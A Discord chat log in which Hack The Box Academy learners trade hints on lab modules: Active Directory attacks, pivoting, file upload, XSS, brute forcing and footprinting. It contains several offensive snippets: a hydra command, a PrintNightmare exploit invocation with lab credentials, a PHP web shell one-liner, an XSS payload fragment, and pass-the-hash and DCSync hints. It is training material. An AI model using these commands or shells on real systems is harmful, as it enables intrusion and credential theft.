dont you just find the directory to the aspx web shell and be done

with the Blue exploit make sure you are using the correct callback address; hint check what other IPs the system has

yeah, i thought that would be the case, but its not leting me navigate..

i guess my hint is... there isnt anyhting to find haha

its just a Q&A...for me I use kali so i had to use the Pwnbox terminal to find the directory of the shell because its different from kali

yeah. i use both tbh. for this im using pwnbox

just seems weird i have the shell on, can systeminfo and get reply. but cant navigate at all

im probably just being an idiot tbh....

iirc you dont need to use the shell...just find the directory on your pwnbox

i mean you do for question 1

^

It's asking for the directory on your system not the upload

lol fml

if you are still suck on this you can either use
sqsh -S (IP) -U htbdbuser -P 'MSSQLAccess01!' -h
or
impacket-mssqlclient htbdbuser:'MSSQLAccess01!'@(ip) -p 1433 -windows-auth

edit: if the mssqlclient don't work with the htbdbuser user remove the -windows-auth tag

my bad, im an idiot and didnt read the question properly

that's a spoiler dawg

oh shit

anyone can help with Active Directory Enumeration & Attacks

Skills Assessment Part I

final question - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. not sure how to go about doing this dsync I have tpe..... credentials.

hi all

the dsync section should show you 2 method of exploiting this and both work for me

Yo ppl

iam Newbie Here

ok ill review that section again

Hi , I m new here. I'm kind of confused on how to get guidance for each machine ? I have no idea what to look for each one .. Isn't there some kind of tuto or steps ?

Thanks!!!

@bitter vine @stable phoenix give both of these video a check if you guys are new to hacking
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

this channel is for the academy module if you need help with boxs verify your account and ask that at #boxes

Oops sorry

hey have you done the pivoting/tunneling/portforward module? Currently trying to get the DLL to load (but the dll keeps disappearing when I try and load it xD

sorry for the late response but for that first disable the av and remember to run the cmd as administrator

I dug through the history and yeah did that, now I have to actually get connected, I have to connect via the first host yeah?

yep the whole point of this section is you can connect from the first host to the third host using the second host as a proxy

so kinda dumb

ohey it worked :^)

The only thing I majorly disliked about this is that you used the SAME hosts

which made some things trivial since you could kinda work around some of the things by using other methods

got it :) I was just making sure I wasn't doing something dumb; just socksoverrdp itself is dumb LOL

ugh I don't feel like fighting things tonight to do the skills assessment LOL i think I'll pick it back up in the morning

were you able to get mimikatz to work to do the dsync? for the final question of ad enum asessment 1

Yep and hint you have to run mimikatz as the right user

ok thanks for the hint lookes like mimikatz dsync worked got the administrator hash.

damn gonna haft to continue this tomorrw

i tried to start a modules and its having me sign in to my htb account but when in enter my email it says it doesn't recognize it

Hi, can someone give me some guidance in the Firewall and IDS/IPS Evasion-Hard Lab? I've tried to use "--source-port 53" to get passed the firewall to get to port 50000. Once I did that I used Ncat to try and grab the banner but it keeps returning "permission denied" am using the wrong port's or am I on the right track?

Yes you are
Try to grab the banner of the service on 5000 again using the (trusted) DNS server as source port it should work

thanks for the guidance, I am getting a connection using "nc -nv --source-port 53 [ip] 80" but no banner. is this the correct command because I'm not sure what you mean by "trusted DNS"

No its not correct
Here you are grabbing the banner of the HTTP service which I cant even recall was running
The aim is to grab the banner of the service running behind the port 5000 so ||ncat -nv --source-port 53 $IP 5000|| Trusted in the sense that the service going to show as filtered(behind a firewall), you would need to sorta DNS proxy with the source port of a DNS server (which the server would think is the internal DNS server) and allow you port scan or banner grab that very filtered service. Please correct me if I am wrong lol

That sounds about right in terms of what we are trying to accomplish, but nevertheless the command simply returns a permission denied followed by a timeout

I've read online people have had success on their own parrot systems so I will try that

alright
Also from what I noticed some attacks/techniques work better on the pwnbox, Hope it helps!

yeah i think you should contact support for that

HTB academy is a separate account

Are you running that command with sudo?

Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?

I have no error message

oh ok i just found it i was supposed to use the input of the website

Solutions disappeared for anyone else? (Enterprise academy - Penetration Tester job role path)

reach out to support

yeah have done and waiting on a response. Just wondered if it was system wide

why do you feel that you need a tgs to continue?

this is not the only thing that you can do

Not very helpful, but I'm stuck at exactly the same exercise. I would also appreciate a nudge in the right direction.

you are on the right track to be honest, however, do not over complicate the things when it is not necessary

basically the hint is more enum, i recommended bloodhound also even with spoiler tag that's literally the answer for one of the question (the username) so can you just remove that?

What rights does generic all give you for groups?

Hey everyone. Having an issue with one of the Academy exercises. HTTP Fundamentals -> HTTP Requests and Responses -> Question 2 at the bottom of the page. I've got the version number, but it's not accepting it.
Anyone else having this issue?
I pulled the same version via Firefox as well as via curl -v.

let's not discuss an assessment

you literally can use the command from the example in cURL

That's the thing though, I'm using the version number that's displayed. Won't say it here obviously.

its a tier 0 module, so go ahead

Sent you a PM

Hey there, I am currently on ATTACKING COMMON SERVIC, name Attacking DNS, for somereason I cannot find anything related with inlanefreight.htb , I added all the ip and name to etc/hosts, but any dig attemps just come back as empty

am i suppose to do anything extra condering the domain is on the p53

What obvious thing am i missing 😄

Has anyone done the skills assessments on Introduction to Deserialization Attacks?

I need help with Zap fuzzer in web proxies.
I manage to get the usernames as md5 hash but I dont know how to turn them into the flag

who finished Active Directory - Skills Assessment II ?

Active directory attacks module

Hi all, I am stuck in Credential Hunting in Linux section. I got the ssh login for kira. But after I am lost on how to get will password. Any hints? L) Can the notes.zip be crack? Thank you~

did you try a dns zone transfer or some tools like gobuster or the recommended tool?

which section are you on? also i think i do that one in burp

sure what's the issue?

hint that file is for a later section and to get to the will user hint check his home directory

https://academy.hackthebox.com/module/110/section/1056

I manage to get the usernames into md5 hash, then I edit the cookie and send but I cant get it to work

yeah my note for this is in zap is a mess but burp is so much better for this

I dont like this at all, and the descriptions what to do in the "academy" is terrible

can you point me in the direction in burp then

in burp intruder "Add" the cookie and in the Payloads tab, go to Payload Processing section and click "Add" and choose Hash > MD5

from the getting started module?

Tried just now but. I have the target and then have added the cookie beneath. Using the top-usernames-shortlist.txt and also md-5 hash but nothing is happening

I just get a first line with "baseline request" and then nothing more

so there is a chance of you doing something wrong

I'm pretty sure I'm doing something wrong, I just dont know what :p

Its not even supposed to be that hard. I mentioned up steps above, what could be wrong?

you are sure that you have selected the cookie that you need to brute force and you have selected the appropriate processor

I did get a second request up now with another cookie

I had snipe selected

I am on skills assessment part II, I got the first credentials and logged in to MS01
but for question #4 and #5 I am stuck

capture the request with a cookie, brute force the cookie using the wordlist while using the processor and you get the flag

I am trying to bruteforce it and it looks like ive applied it correctly but obviously I havent

if you check the congrats page of the module there's a list of boxes

The list of boxes though is generally retired boxes

take a 2-3 minute break, start from scratch and you will get it

do something funny for span of the break

or watch something funny

sorry for the delay but everything is super slow right now on my end for some F ing reason and i'm still trying to get burp to load so give me a sec

did you read the hint on question 4?

there is no hint

its part 2

"Use a common method to obtain weak credentials for another user"

my note said there is let me give that a cred

oh wait that is the hint in my note

its the actual question

so there is "weak credentials" and hint the cred was showed in previous section

no idea why i put that as a hint in my note, i guess the question kinda hint the answer

yes

Then got the results and added in decoders

yep just give it a test run and it's worked just fine for me

so when you run it nothing change for the length for all request?

let's not forget that this isn't a tier 0 module

oh spoiler?

everything and even a bit beyond to solve the exercise is either here and especially in the section of the module

Im running another attack and I see nothing

im running it towards ip:port/skills/

Like it says

so this is not allowed?

i mean you are literally pasting out the solution

shoot me a dm with your output

even the solution to be in the section of the module

still, they need to practice rather than to rely on someone else to give them the exact instructions

yes I know the solution but im doing something wrong along the way

and ive been at this for 4 hours now so its just a waste of time for everyone at this point

as I told you, take a break, it tends to help

it is not a hard exercise, just be calm and take your time to explain each and every step to you first

then try to compare it in the section with the examples and see where you might have been doing something wrong

also, do not forget learning from mistakes (big or small ones) helps you tremendeously

Hi

Has anyone completed the blind sqli module? I’m absolutely stuck on the final assessment. Any one I can chat with?

so when the instructions give you information, but don't tell you where the information comes from...was i supposed to find that part on my own within the previous steps?

hey guys im doing AD Enumeration & Attacks - Skills Assessment Part II
got stuck on Q7.Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
i managed to login to sql
when i try to transfer files but doesn't write to disk.
i also tried to impersonate sql users like the mssql section but couldn't get to read Administrator desktop files

remove some of the spoilers ^, make sure that the file is written to disk correctly and what else you can do with that file

I'm stuck on the module login brute forcing - login form attacks. I ran the command "hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 139.59.167.73 -s 30966 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"" and got back the login credentials (removed), but the page still isn't letting me login. Is that not the correct login credentials?

seems correct to me, but please remove the credentials, also feel free to issue a reset on the target

I just reset my terminal and now the command isn't running and when I try to go to the webpage, it says connection timed out

if you have issued a reset on the target, then there will be a new IP

Is it normal for the sqlmap labs to be so slow?

depends on the type of an attack you are doing and the parameters that you have specified

It keeps complaining about the connection timing out

I was having trouble with them yesterday when trying to use Kali over openvpn. I switched over to using the pwnbox and it was better. Not great, but enough to finish the labs.

Thanks I'll try that next

Question about Password Attacks Lab - Hard.
Should I start by brute forcing winrm with johanna or start somewhere else?

in Active directory Miscellaneous Misconfigurations part .. printNightmare exploit code on the machine gives me The network path was not found. and I don't actually find entries in the logs of any trying to access that path
The command i sendis -> sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\10.129.126.194\CompData\backupscript.dll'

When I tried to access the smb myself I was able to view that backupscript
I logged in using smbclient

Okay i managed to do it. There's no path between these two subnets. I guess

OK...... I maybe have gone insane.
Has anyone else performed XYZ test on a box in the modules, where the test initially fails.... but after 30 minutes of head smashing try the test again and it works?

Please DM me.

Yes happened to me

Glad I am not the only one... this makes me half way believe I am not doing anything right half the time.

all I can say is we have a ton of cool stuff coming so stay tuned 😉

😍

200k members passed now lol

Hopefully academy giveaway coming up 🥳 🤭

maybe at this event
https://discord.gg/hackthebox?event=1075450015192989716

Nice catch @acoustic owl lol

I am theorizing more game hacking stuff. Bmdyy has written some modules and they have been doing game hacking related stuff on there channel recently

Also there have been a lot of advanced web attack modules released recently which leads me to believe a new skill path? 🤨

Duddereeeee

I need reversing stuff 🥺

Although, game hacking is also quite interesting, seems like it's worth a deep dive into it

This!!

Also more red team stuff please

I want a car pentesting module but that would be kinda hard to do

UPLOAD ATTACKS FINAL ASSESMENTS:
I'm searching a test file cause im getting 404 with everything and can't find it aswell: ||/contact/user_feedback_submissions/230215_test.jpeg||

any help please

I theorize possibly more blue team stuff cuz HTBs main competitor is THM and THM is currently doing better in the blue team area

It worked, thank you! There is always one question that takes the longest.

@sly reef what is the problem

@sly reef you did not upload the shell

no

it is a test

an image

which i should be able to see

where are you geographically

spain

oh

server time

fml

Date: Wed, 15 Feb 2023 18:59:09 GMT

shouldnt this be 230215 anyway

@sly reef dm

I think that even gives a Job Role Path.
Probably something like OSWE

hi someone could help with Bloodhound Module, the zip files contain json files that can not be Open on Bloodhound even pwnbox Bloodhound !! , Amaizing how outdated that module is. Anyone with knows on what versión works ?

bloodhound is pretty notoriously picky about version differences with its ingestors

either gotta use an older version of bloodhound with something like docker or run new ingestor again(if lab has the targets)

shell & payloads

Ok, I feel pretty stupid because I've been learning Linux basics for a couple of weeks now but I'm totally stuck in the first part of Linux Fundamentals/System Information/"What is the path to the htb-student's mail?". For sure it's super easy and obvious but I can't find the way. I've even tried searching around in other pages and none of the options worked. Help please!

try ||SSHing to the target and then run the "env" command ||

Learning how to look up certificates for websites helps

Are there any modules that teach you powershell well?

hey , need some help in Firewall and IDS/IPS Evasion - Medium Lab , we have to enumerate dns server version , I got the version but it's not accepting , any help would be appreciated

module is related to job-role path

Hello, I am working on "ACTIVE DIRECTORY BLOODHOUND" and I am having a problem importing a .zip file into BloodHound.

I constantly receive the message "BAD JSON FILE" when importing the BloodHound data and have not been able to fix it by running the 2020 version. Is there a way to fix this issue?

@shell marsh I went to look back to see what the answer was to the question since i complete the module. The answer states submit the dns version number as the answer, however the submitted answer that I have is a flag lol...

please check and let me know if I am heading towards right direction

help please on xss, phishing, combing, html and xss?? any pointers?

Online Image Viewer

Please login to continue
;document.getElementById('urlform').remove();

which module

xss

phishing section trying to build the script but vasnt get the doc write id part

xss
phishing section trying to build the script but vasnt get the doc write id part

right there with ya bro, i ussed xssstrike to get the payload just cant get id part to work

how are u friend? did u solve this part as im stuck here same issues? thanks

hello friend, im in the same spot any pointers? i cant remove the get elemnt part which shows on the page?

hello im in the same boat but the bormoval part. to get rid of documnet change the single quote to outside....."Login"></form>)'

Madfox looks like he’s trying to help you out so you don’t need to keep pinging people

sorry thank you. where can i see that?

Can I dm you about this?

sure much apreciated

Stuck on "Password Attacks" > "Protected Files"

I was hoping Kira's credentials were the same as the earlier cracking exercises, but that appears to not be the case. Any nudges on mutation schemas?

In this channel above from 15 minutes ago

Thank you

sure

How is everyone doing ? Recently started HTB

I'm on Hacking WordPress - Skills Assessment. I have every question answered execpt for Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Any nudge in the right direction would be appreciated. I've saved the wpscan results but I feel like I'm missing something

Look what plugins are installed and then look for a CVE

Linux Local Privilege Escalation - Skills Assessment: I have gotten flags 1-3, gotten barry's creds and been looking through the logs file for anything of use. For flag4, I am told to look at external services. The two that I see are the apache webserver on port 80 and the tomcat one on 8080. I am assuming I need a way to exploit some vulnerability in these web services?

Jeez. Got it. Ty

try ||hunting for creds 🐱 ||

Am having issues with the www.inlanefreight.com section

Curl www.inlanefreight.com isn't returning the full source code from the site. What can I do?

If you just started the HTTP section, I ran into the same problem. Didn't spawn the VM first. lol

Mine was trying to redirect to a new version

Hey guys and gals, I'm having some trouble with Footprinting module, the IMAP/POP3 section. Is there anybody that can help me understand the ways to solve the last two questions, and especially how does one use imaps (it's driving me insane!)?

whats the problem?

you need to check other resources for that section by the way

finally got help from one of the admins. The imap syntax is a bit crazy. Any advice on how to learn more about using it? and which resources do you mean?

@west canopy aw, I see I didn't try the || default creds route enough ||

I used Google to find a site with the IMAP information I needed

this looks pretty good
https://www.atmail.com/blog/imap-commands/

Thank you!

Is there any way to contact HTB Academy staff about a billing issue? I've been scouring the site for a way to create a help ticket or something similar and I cannot find it

Turn off adblocker if on

Then there should be a chat bubble on the bottom right

Awesome, I appreciate you

Mod: shells and payloads
sec: Live engagement
second question
so it tells you password for login - then find the upload -tried using wwwolf-php-webshell from previous module. with changing content type to war file. = not working
any pointers?

Hello

what do you mean by not working?

if I am not mistaken you should upload war file to apache tomcat without any issue

im using the script from the previous module https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php and from previous module ya just select that then change content-type to image/gif but for this is war file required so changed to war etc. - errors

so do you need help with anything? or just want to send the friend request

Hi all

i am stuck in footprints easy section as i used the wget command to get the files but the files are not downloading it always shows try to connect. same this happened for a week.
Please help me.

Thanks

that shell kinda suck ass try the java/jsp_shell_reverse_tcp shell in metasploit or even the default one at /usr/share/davtest/backdoors/jsp_win_cmd.jsp will work just fine

if you are in the ||ftp|| stop using wget use the ||ftp|| tool

and use the get command to download file

i also use this way... but still can find the flag in ids-rsa..

and any other files as well..

or am i doing something wrong?

so you think the skill assessment is just login and get the flag?

check war payloads or sth. I dont know what to tell you. It is a bit simpler than what you are doing right now

this is the correct path you found a ssh key and hint ||use it||

yes i got the ssh key.

keys usually open things

What’s the key

the key is

Lol

File Upload - Whitelist Filters

1. I am following along with the instructions and it shows us that with double extensions we use a certain wordlist and are asked as an exercise to fuzz the upload form and see whats whitelisted by the upload form. I've used the exact list several times and I'm not understanding why I'm not seeing anything that is whitelisted by the upload form (I assume its supposed to show some).

2. After this little exercise it asks us to intercept a normal upload request and modify the file name to shell.jpg.php and insert the contents to <?php system($_REQUEST['cmd']); ?>

Trying to understand where I might be misapplying what its asking to me to do.

Tryinjg to get some understanding on what I might not be understanding or doing correctly with the scenario as I've gone through it a couple of times and its throwing me for a loop even though I'm just copy / pasting along with the steps

Hey need a nudge on Active Directory Enumeration & Attacks skill assessment 1

on the final question.

Think im very close but not sure how to connect to DC01 computer I have the administrators NTLM hash. Have not been able to successfully crack the hash though im guessing I need to do some kind of pass the hash. Been trying to do all this from the MS01 RDP window. Trying to pass the hash with mimikatz to dc01 proven unsuccesfull for me so far.

hint try something like evil winrm and using the MS01 as a pivot machine

ok thanks for the hint

i don't remember exactly but i think there is a whitelisted extension somewhere on the target that you can find but that doesn't really matter the thing about this section is the goal is to mimic one of the whitelist extension
so for example if the jpg extension is whitelisted you can try something like php\x00.jpg like the example show

So I'm not actually even doing the "question" for it. Just following along with whats shown.

and hint the section does give you a script to make the wordlist and you can just use that but change or add more or different extension to that script

I'm just walking myself through for understanding and just following along / taking notes through whats shown

etc etc

so are you following the example in the first burp screenshot? (wait nope wrong one)

Screenshot under "Dobuble extensions"

Is where i'm at

hint not all example showed is the actual target

Oh ><

I was gonna waste a ton of time t y for the info

I understand the idea

so for this it's a form of Dobuble extensions but not 100% exactly like the example show

ok thanks for your help today and yesterday MRtom. Ended up finishing the first asessment. I actually just ended up passing the hash with mimikatz opening a cmd as the dc01 adminsitrator. Found out the syntax I was using to try to navigate to the DC01 file system from the MS01 cmd shell was incorrect but another user showed me correct syntax

np and i guess mimikatz should work because this is just a simple pass the hash to get RCE

but for this you can also use get meterpreter shell on MS01 and use ||autoroute + socks server|| and after that use ||proxychains4 + evil winrm|| to get RCE on DC01

Okay yea I saw some possibilities to try but was confused and had just assume it was showing what we should see/ do /etc

ty for the clarification

👍

will add that to my notes

Or chisel lol

some how i didn't even touch chisel in offshore 🤣

hi everyone 🙂

@vital adder are you here by chance just got back and having slight understanding / problem on same section

I've got the file upload succeeding and am not able to get the requests

so I should be able to just ?cmd=xxx but its 404ing

this maybe the case #modules message

try accessing it in burp

hmm

so it gets the php code back but not execution

of course

if you upload it using an extension that can't run php code like an image extension it will just display the image in this case the payload

Facepalm.jpg thats the smack inthe face I needed

Aight I got this from here hopefully

hey can anyone give me a nudge on Skills Assessment - File Inclusion?

i get two types of response sizes while fuzzing the parameter but dont know which one is the correct one am i on the right track? just for the sanity check

i need help with sqlmap skill assessment

explain a little bit more than that please

how to navigate between panes in tmux?
I tried Ctrl+B followed by the Up arrow to move to the top pane but it's not working.

@vital adder are you not sleeping? Everytime I look in here you are helping someone 😅

i don't (i'm a hacker 🤣 )

if you are in the Documentation & Reporting module try all showed method

what's the issue?

you got the first part right but hint to be able to read file you need to use a different method

lmao fr

he should be a staff ong

I think he will be, soon enough 😄

Dm if you still need help

yeah.... i did get the offered but it's been over a month without any update

Well wasnt it this month everything happened? Money in the bank account, new stuff on the website, might have slipped through. Ask for an update :p

of course but i still got a lot of plant right now and i may can't take the offered unfortunately 😢 but of course i will ask for some info at least after offshore

i got 3 machine left

Always doing the lords work mrtom

Helping us scrubs inch along

also mrb3n make that lab (offshore) so i may write a long ass "pentest report" and send him that

Hello everyone,
For the Introduction to Web Applications module, Section 2 (Web Application Layout).
Can anyone give me a clear difference between Client-Server Infrastructure and One Server Infrastructure?

Reading through these modules makes me feel incredibly stupid

I understand pretty well most of what i'm going through...but when I read it I just like fail to understand what its wanting / asking half the time.

the 2 images about Client-Server and One Server is right next to each other

oh yeah i guess both of them are kinda the same

Thank you!

Hi all

i am stuck in footprinting easy lab.
as i downloaded all the files one by one and i checked each file. but i couldn't find any flag. Any hints please.
i thinks its in id_rsa file but no luck.
please help me

Thanks

again this is an skill assessment you can't just download file from the ftp and get the flag and again the id_rsa is an ssh key use the key to login via ssh

okay i try . thanks for your hint.

@vital adder when i tried with key.. it says permission denied.

do we need to provide any other command

i am using ssh -i private key user@ip

did you change the key permissions?

no ..

its same as it is.

change it to 600

i tried each 48 keys.

yes i did that..

chmod 600

i did that.

why and where did you get 48 keys?

id_rsa contains 48 keys.

even i tried id_rsa.pub

it doesn't work.

let me try again to id_rsa

i think i am doing something wrong..